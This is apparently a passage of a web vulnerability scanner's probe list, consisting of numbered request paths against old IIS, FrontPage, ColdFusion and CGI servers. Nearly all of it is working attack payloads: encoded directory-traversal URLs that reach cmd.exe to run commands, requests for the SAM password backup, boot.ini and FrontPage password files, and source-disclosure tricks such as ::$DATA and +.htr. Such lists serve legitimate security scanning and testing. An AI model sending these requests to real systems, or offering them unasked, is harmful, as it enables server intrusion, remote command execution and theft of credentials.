/_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[34]
/_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[35]
/_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[36]
/a.asp/..%%35%63../..%%35%63../winnt/win.ini
[37]
/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._
[38]
/a.asp/..%%35c../..%%35c../winnt/win.ini
[39]
/a.asp/..%%35c../..%%35c..\winnt\repair\sam._
[40]
/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini
[41]
/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam.
[42]_
/a.asp/..%255c../..%255c../winnt/win.ini
[43]
/a.asp/..%255c../..%255c..\winnt\repair\sam._
[44]
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[45]
/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[46]
/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[47]
/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[48]
/adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[49]
/adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[50]
/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[51]
/adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[52]
/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[53]
/bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[54]
/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[55]
/bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[56]
/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[57]
/bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[58]
/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[59]
/bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[60]
/bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[61]
/bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[62]
/bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[63]
/bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[64]
/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[65]
/bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
[66]
/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[67]
/bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
[68]
/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[69]
/bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
[70]
/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[71]
/bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
[72]
/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[73]
/cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[74]
/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[75]
/cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[76]
/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[77]
/cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[78]
/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[79]
/cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[80]
/cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[81]
/cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[82]
/cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[83]
/cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[84]
/cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[85]
/cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[86]
/cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[87]
/cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[88]
/cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[89]
/cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[90]
/cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[91]
/cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[92]
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[93]
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[94]
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[95]
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[96]
/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[97]
/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[98]
/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[99]
/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[100]
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[101]
/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[102]
/msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir
[103]
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[104]
/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[105]
/msadc/..%%35c../winnt/system32/cmd.exe?/c+dir
[106]
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[107]
/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[108]
/msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir
[109]
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[110]
/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[111]
/msadc/..%255c../winnt/system32/cmd.exe?/c+dir
[112]
/msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[113]
/msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[114]
/msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[115]
/msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[116]
/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[117]
/PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[118]
/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[119]
/PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[120]
/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[121]
/PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[122]
/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[123]
/PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[124]
/PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[125]
/PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[126]
/PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[127]
/PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[128]
/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[129]
/Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[130]
/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[131]
/Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[132]
/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[133]
/Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[134]
/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[135]
/Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[136]
/Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[137]
/Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[138]
/Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[139]
/Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[140]
/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[141]
/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[142]
/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[143]
/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[144]
/samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[145]
/samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[146]
/samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[147]
/samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[148]
/script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[149]
/script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[150]
/script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[151]
/script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[152]
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[153]
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[154]
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
[155]
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[156]
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[157]
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
[158]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[159]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[160]
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
[161]
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
[162]
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[163]
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[164]
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
[165]
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
[166]
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
[167]
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
[168]
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\

[CGI-NT]
/...................../config.sys
[1]
/..................../boot.ini
[2]
/.................../boot.ini
[3]
/................../boot.ini
[4]
/................./boot.ini
[5]
/................/boot.ini
[6]
/.............../boot.ini
[7]
/............../boot.ini
[8]
/............./boot.ini
[9]
/............/boot.ini
[10]
/.........../boot.ini
[11]
/........../autoexec.bat
[12]
/........../boot.ini
[13]
/........./boot.ini
[14]
/......../boot.ini
[15]
/......./boot.ini
[16]
/....../
[17]
/....../ all
[18]
/....../autoexec.bat
[19]
/....../boot.ini
[20]
/....../config.sys
[21]
/...../boot.ini
[22]
/..../boot.ini
[23]
/..../config.sys
[24]
/..../Windows/Admin.pwl
[25] 
/.../boot.ini
[26]
/../../../../ all
[27]
/../../../../../../../../boot.ini
[28]
/../../../../../../../boot.ini
[29]
/../../../../../../boot.ini
[30]
/../../../../../../Scandisk.log
[31]
/../../../../../boot.ini
[32]
/../../../../../winnt/repair/sam._
[33]
/../../../../boot.ini
[34]
/../../../../config.sys
[35]
/../../../autoexec.bat
[36]
/../../../boot.ini
[37]
/../../../scandisk.log
[38]
/../../boot.ini
[39]
/../../windows/user.dat
[40]
/../../winnt/win.ini
[41]
/../boot.ini
[42]
/..\..\..\..\..\..\autoexec.bat
[43]
/..\..\..\..\..\autoexec.bat
[44]
/..\..\..\..\autoexec.bat
[45]
/..\..\..\autoexec.bat
[46]
/..\..\..\winnt\repair\sam._
[47]
/..\..\autoexec.bat
[48]
/..\\..\\..\\..\\..\\..\autoexec.bat
[49]
/..\\..\\..\winnt\repair\sam._
[50]
/.html/............*/config.sys
[51]
/.html/............./config.sys
[52]
/.html/............/autoexec.bat
[53]
/.jsp/WEB-INF/classes/Env.java
[54]
/.nsf/../winnt/win.ini
[55]
/?PageServices
[56]
/\../boot.ini
[57]
/\../config.sys
[58]
/\../readme.txt
[59]
/_AuthChangeUrl
[60]
/_AuthChangeUrl?
[61]
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir
[62]
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
[63]
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
[64]
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
[65]
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir
[66]
/_private
[67]
/_private/form_results.txt
[68]
/_private/orders.txt
[69]
/_private/register.txt
[70]
/_private/registrations.txt
[71]
/_private/shopping_cart.mdb
[72]
/_vti_adm/admin.dll
[73] 
/_vti_bin
[74] 
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir
[75]
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
[76]
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
[77]
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
[78]
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir
[79]
/_vti_bin/_vti_adm
[80] 
/_vti_bin/_vti_aut
[81] 
/_vti_bin/_vti_aut/author.dll
[82] 
/_vti_bin/_vti_aut/dvwssr.dll
[83]
/_vti_bin/fpcount.exe
[84]
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
[85] 
/_vti_bin/fpexe
[86]
/_vti_bin/shtml.dll
[87]
/_vti_bin/shtml.dll/_vti_rpc
[88]
/_vti_bin/shtml.dll/nosuch.htm
[89]
/_vti_bin/shtml.exe
[90]
/_vti_inf.html
[91]
/_vti_log
[92] 
/_vti_pvt
[93]
/_vti_pvt/
[94]
/_vti_pvt/administrator.pwd
[95]
/_vti_pvt/administrators.pwd
[96]
/_vti_pvt/author.log
[97]
/_vti_pvt/authors.pwd
[98]
/_vti_pvt/doctodep.btr
[99]
/_vti_pvt/service.grp
[100]
/_vti_pvt/service.pwd
[101]
/_vti_pvt/shtml.dll
[102]
/_vti_pvt/shtml.exe
[103]
/_vti_pvt/users.pwd
[104]
/_vti_txt
[105] 
/a.asp/..\../..\../winnt/repair/sam
[106]
/a.jsp//..//..//..//..//..//../winnt/win.ini
[107]
/abczxv.htw
[108]
/Admin_files/order.log
[109]
/admisapi/ 
[110]
/admisapi/fpadmin.htm
[111]
/adsamples/config/site.csc
[112]
/AdvWorks/equipment/catalog_type.asp
[113]
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
[114]
/app.cfm
[115]
/ASPSamp/AdvWorks/equipment/catalog_type.asp
[116]
/autoexec.bat
[117]
/bdir.htr
[118]
/bin/common/user_update_admin.pl
[119]
/bin/common/user_update_passwd.pl
[120]
/bin/scripts/../../../../winnt/system32/cmd.exe /c+dir?/c+dir%20c:\
[121]
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
[122]
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
[123]
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir
[124]
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
[125]
/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir
[126]
/bin/scripts/openvendor/gnete/RetrievePNBody.asp
[127]
/blabla.idq
[128]
/carbo.dll
[129]
/catalog.nsf
[130]
/catalog.nsf/
[131]
/cfappman/index.cfm
[132]
/cfcache.map
[133]
/cfdocs/cfmlsyntaxcheck.cfm
[134]
/cfdocs/exampleapp/docs/sourcewindow.cfm
[135]
/cfdocs/exampleapp/email/getfile.cfm
[136]
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
[137]
/cfdocs/exampleapp/publish/admin/addcontent.cfm
[138]
/cfdocs/examples/cvbeans/beaninfo.cfm
[139]
/cfdocs/examples/httpclient/mainframeset.cfm
[140]
/cfdocs/examples/parks/detail.cfm
[141]
/cfdocs/expelval/displayopenedfile.cfm
[142]
/cfdocs/expelval/exprcalc.cfm
[143]
/cfdocs/expelval/openfile.cfm
[144]
/cfdocs/expelval/sendmail.cfm
[145]
/cfdocs/expeval/displayopenedfile.cfm
[146]
/cfdocs/expeval/eval.cfm
[147]
/cfdocs/expeval/exprcalc.cfm
[148]
/cfdocs/expeval/ExprCalc.cfm
[149]
/cfdocs/expeval/openfile.cfm
[150]
/cfdocs/expeval/sendmail.cfm
[151]
/cfdocs/root.cfm
[152]
/cfdocs/snippets/evaluate.cfm
[153]
/cfdocs/snippets/fileexists.cfm
[154]
/cfdocs/snippets/gettempdirectory.cfm
[155]
/cfdocs/snippets/viewexample.cfm
[156]
/cfide/administrator/index.cfm
[157]
/cfusion/cfapps/forums/data/forums.mdb
[158]
/cfusion/cfapps/security/data/realm.mdb
[159]
/cfusion/cfapps/security/realm_.mdb
[160]
/cfusion/database/cfsnippets.mdb
[161]
/cfusion/database/cypress.mdb
[162]
/cfusion/database/smpolicy.mdb
[163]
/cgi
[164]
/cgi/
[165]
/cgibin
[166]
/cgi-bin
[167]
/cgi-bin/
[168] 
/cgi-bin/../../../../winnt/system32/cmd.exe
[169]
/cgi-bin/..\..\..\../winnt/system32/cmd.exe
[170]
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
[171]
/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
[172]
/cgi-bin/_vti_cnf
[173] 
/cgi-bin/alibaba.pl
[174]
/cgi-bin/bb-hostsvc.sh
[175]
/cgi-bin/c32web.exe/CheckError?error=53
[176]
/cgi-bin/c32web.exe/ShowAdminDir
[177]
/cgi-bin/ceilidh.exe
[178]
/cgi-bin/cgitest.exe
[179]
/cgi-bin/changepw.exe
[180]
/cgi-bin/echo.bat
[181]
/cgi-bin/fpcount.exe
[182]
/cgi-bin/fpexplore.exe
[183]
/cgi-bin/fpexplorer.exe
[184]
/cgi-bin/get32.exe
[185]
/cgi-bin/get32.exe\dir
[186]
/cgi-bin/guestbook.cgi
[187]
/cgi-bin/GW5
[188]
/cgi-bin/GW5/GWWEB.EXE
[189]
/cgi-bin/GWWEB.EXE
[190]
/cgi-bin/hello.bat
[191]
/cgi-bin/htimage.exe
[192]
/cgi-bin/iisadmpwd/achg.htr
[193]
/cgi-bin/iisadmpwd/aexp.htr
[194]
/cgi-bin/iisadmpwd/aexp2.htr
[195]
/cgi-bin/iisadmpwd/anot.htr
[196]
/cgi-bin/imagemap.exe
[197]
/cgi-bin/input.bat
[198]
/cgi-bin/input2.bat
[199]
/cgi-bin/lsindex2.bat
[200]
/cgi-bin/mailform.exe
[201]
/cgi-bin/perl.exe
[202]
/cgi-bin/post32.exe
[203]
/cgi-bin/ppdscgi.exe
[204]
/cgi-bin/redirect.exe
[205]
/cgi-bin/rguest.exe
[206]
/cgi-bin/sam._
[207]
/cgi-bin/scripts/perl.exe
[208]
/cgi-bin/search97.vts
[209]
/cgi-bin/shop.cgi
[210]
/cgi-bin/shopper.cgi
[211]
/cgi-bin/snorkerz.bat
[212]
/cgi-bin/snorkerz.cmd
[213]
/cgi-bin/statsconfig.pl
[214]
/cgi-bin/test.bat
[215]
/cgi-bin/test.cgi
[216]
/cgi-bin/tst.bat
[217]
/cgi-bin/tst.bat\dir
[218]
/cgi-bin/visadmin.exe
[219]
/cgi-bin/visadmin.exe?user=guest
[220]
/cgi-bin/visitor.exe
[221]
/cgi-bin/wconsole.dll
[222]
/cgi-bin/Web_Store/web_store.cgi
[223]
/cgi-bin/webplus.exe
[224]
/cgi-bin/wguest.exe
[225]
/cgi-bin/windmail.exe
[226]
/cgi-dos/args.bat
[227]
/cgi-dos/args.cmd
[228]
/cgi-shl/win-c-sample.exe
[229]
/cgi-win
[230]
/cgi-win/perl.exe
[231]
/cgi-win/uploader.exe
[232]
/cgi-win/wguest.exe
[233]
/cgi-win/wincgi.bat 
[234]
/cmd.exe?/c+dir%20c:\
[235]
/com1
[236]
/com2
[237]
/com3
[238]
/com4
[239]
/common/browser.inc
[240]
/con/con
[241]
/config/checks.txt
[242]
/config/import.txt
[243]
/config/mountain.cfg
[244]
/config/orders.txt
[245]
/cpqlogin.htm
[246]
/default.asp
[247]
/default.asp%2e
[248]
/default.asp%2e%41sp
[249]
/default.asp%81
[250]
/default.asp.
[251]
/default.asp::$DATA
[252]
/default.asp\\
[253]
/default.asp+.htr
[254]
/doc
[255]
/enter_bug.cgi
[256]
/ex/jsp/simple.jsp.
[257]
/file/index.jsp
[258]
/getfile.cfm
[259]
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
[260]
/global.asa+.htr
[261]
/head.css
[262]
/hosts.dat
[263]
/iisadmin 
[264]
/iisadmin/
[265]
/iisadmpwd/achg.htr
[266]
/iisadmpwd/aexp.htr
[267]
/iisadmpwd/aexp2.htr
[268]
/iisadmpwd/aexp2b.htr
[269]
/iisadmpwd/aexp3.htr
[270]
/iisadmpwd/aexp4.htr
[271]
/iisadmpwd/aexp4b.htr
[272]
/iisadmpwd/anot.htr
[273]
/iisadmpwd/anot3.htr
[274]
/iisamples/Sdk 
[275]
/iishelp/iis/misc/iirturnh.htw
[276]
/iissamples 
[277]
/iissamples/Default 
[278]
/iissamples/ExAir 
[279]
/iissamples/exair/howitworks/code.asp
[280]
/iissamples/exair/howitworks/codebrws.asp
[281]
/iissamples/exair/howitworks/showcode.asp
[282]
/iissamples/exair/search/advsearch.asp
[283]
/iissamples/exair/search/qfullhit.htw
[284]
/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
[285]
/iissamples/exair/search/qsumrhit.htw
[286]
/iissamples/exair/search/query.idq
[287]
/IISSAMPLES/ExAir/Search/search.asp
[288]
/iissamples/exair/search/search.idq
[289]
/iissamples/iissamples/query.asp
[290]
/iissamples/ISSamples 
[291]
/iissamples/issamples/fastq.idq
[292]
/iissamples/issamples/oop/qfullhit.htw
[293]
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full
[294]
/iissamples/issamples/oop/qsumrhit.htw
[295]
/iissamples/issamples/query.asp
[296]
/iissamples/issamples/query.idq
[297]
/iissamples/sdk/asp/docs/codebrws.asp
[298]
/include/css.css
[299]
/include/head.html
[300]
/index.asp%2e
[301]
/index.asp%2e%41sp
[302]
/index.asp%81
[303]
/index.asp.
[304]
/index.asp::$DATA
[305]
/index.asp\\
[306]
/index.asp+.htr
[307]
/index.JSP
[308]
/index.php3.%5c../..%5cconf/httpd.conf
[309]
/isapi/tstisapi.dll
[310]
/login.asp%3F+.htr
[311]
/main.asp%2e
[312]
/main.asp%2e%41sp
[313]
/main.asp%81
[314]
/main.asp.
[315]
/main.asp::$DATA
[316]
/main.asp\\
[317]
/main.asp+.htr
[318]
/msadc
[319]
/msadc/../../../../winnt/system32/cmd.exe?/c+dir
[320]
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
[321]
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir
[322]
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\
[323]
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir
[324]
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
[325]
/msadc/.._../winnt/system32/cmd.exe?/c+dir
[326]
/msadc/msadcs.dll
[327]
/msadc/samples/adctest.asp
[328]
/msadc/Samples/SELECTOR/codebrws.cfm
[329]
/msadc/samples/selector/showcode.asp
[330]
/msadc/samples/selector/showcode.asp_2
[331]
/nofile.pl
[332]
/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
[333]
/null.ida
[334]
/null.idc
[335]
/null.idq
[336]
/officescan/cgi/jdkRqNotify.exe
[337]
/ows-bin/perlidlc.bat?&dir
[338]
/passwd
[339]
/passwd.txt
[340]
/password
[341]
/password.dat
[342]
/password.log
[343]
/password.txt
[344]
/pbserver/
[345]
/pbserver/pbserver.dll
[346]
/private
[347]
/process_bug.cgi
[348]
/Proxy/LoginResponse
[349]
/rightfax/fuwww.dll
[350]
/rightfax/fuwww.dll/
[351]
/robots.txt
[352]
/sample.asp
[353]
/samples/search/queryhit.htm
[354]
/script/.._../winnt/system32/cmd.exe?/c+dir
[355]
/scripts
[356]
/scripts/
[357]
/scripts/*
[358]
/scripts/*.pl
[359]
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir
[360]
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\
[361]
/scripts/../../cmd.exe
[362]
/scripts/../../winnt/system32/cmd.exe?/c+dir
[363]
/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\
[364]
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir
[365]
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
[366]
/scripts/.._../winnt/system32/cmd.exe?/c+dir
[367]
/scripts/bbs.pl%3F+.htr
[368]
/scripts/c32web.exe
[369]
/scripts/c32web.exe/ChangeAdminPassword
[370]
/scripts/Carello/add.exe
[371]
/scripts/cart32.exe
[372]
/scripts/cart32.exe/cart32clientlist
[373]
/scripts/cgimail.exe
[374]
/scripts/CGImail.exe
[375]
/scripts/cmd.exe
[376]
/scripts/cmd.exe?/c+dir%20c:\
[377]
/scripts/cmd32.exe
[378]
/scripts/cmd32.exe?/c+dir
[379]
/scripts/convert.bas
[380]
/scripts/counter.exe
[381]
/scripts/cpshost.dll
[382]
/scripts/dbman/db.cgi?db=invalid-db
[383]
/scripts/dmailweb.exe
[384]
/scripts/dnewsweb.exe
[385]
/scripts/emurl/RECMAN.dll
[386]
/scripts/environ.pl
[387]
/scripts/Fpadmcgi.exe 
[388]
/scripts/fpcount.exe
[389]
/scripts/gupcgi.exe
[390]
/scripts/htimage.exe
[391]
/scripts/iisadmin 
[392]
/scripts/iisadmin/bdir.htr
[393]
/scripts/iisadmin/default.htm 
[394]
/scripts/iisadmin/ism.dll
[395]
/scripts/iisadmin/ism.dll?http/dir
[396]
/scripts/iisadmin/samples 
[397]
/scripts/iisadmin/tools 
[398]
/scripts/iisadmin/tools/ctss.idc
[399]
/scripts/iisadmin/tools/getdrvrs.exe
[400]
/scripts/iisadmin/tools/mkilog.exe
[401]
/scripts/IISADMPWD 
[402]
/scripts/issadmin/bdir.htr
[403]
/scripts/lsass.exe
[404]
/scripts/no-such-file.pl
[405]
/scripts/perl
[406]
/scripts/pfieffer.bat
[407]
/scripts/pfieffer.cmd
[408]
/scripts/postinfo.asp
[409]
/scripts/proxy/w3proxy.dll
[410]
/scripts/repost.asp
[411]
/scripts/rguest.exe
[412]
/scripts/samples 
[413]
/scripts/samples/ctguestb.idc
[414]
/scripts/samples/details.idc
[415]
/scripts/samples/search/author.idq
[416]
/scripts/samples/search/filesize.idq
[417]
/scripts/samples/search/filetime.idq
[418]
/scripts/samples/search/qfullhit.htw
[419]
/scripts/samples/search/qsumrhit.htw
[420]
/scripts/samples/search/query.idq
[421]
/scripts/samples/search/queryhit.idq
[422]
/scripts/samples/search/simple.idq
[423]
/scripts/samples/search/webhits.exe
[424]
/scripts/slxweb.dll
[425]
/scripts/srchadm/webhits.exe
[426]
/scripts/tools 
[427]
/scripts/tools/dsnform.exe
[428]
/scripts/tools/getdrvrs.exe
[429]
/scripts/tools/getdrvs.exe
[430]
/scripts/tools/mkilog.exe
[431]
/scripts/tools/newdsn.exe
[432]
/scripts/tools/uploadn.asp
[433]
/scripts/tools/uploadx.asp
[434]
/scripts/upload.asp
[435]
/scripts/uploadn.asp
[436]
/scripts/uploadx.asp
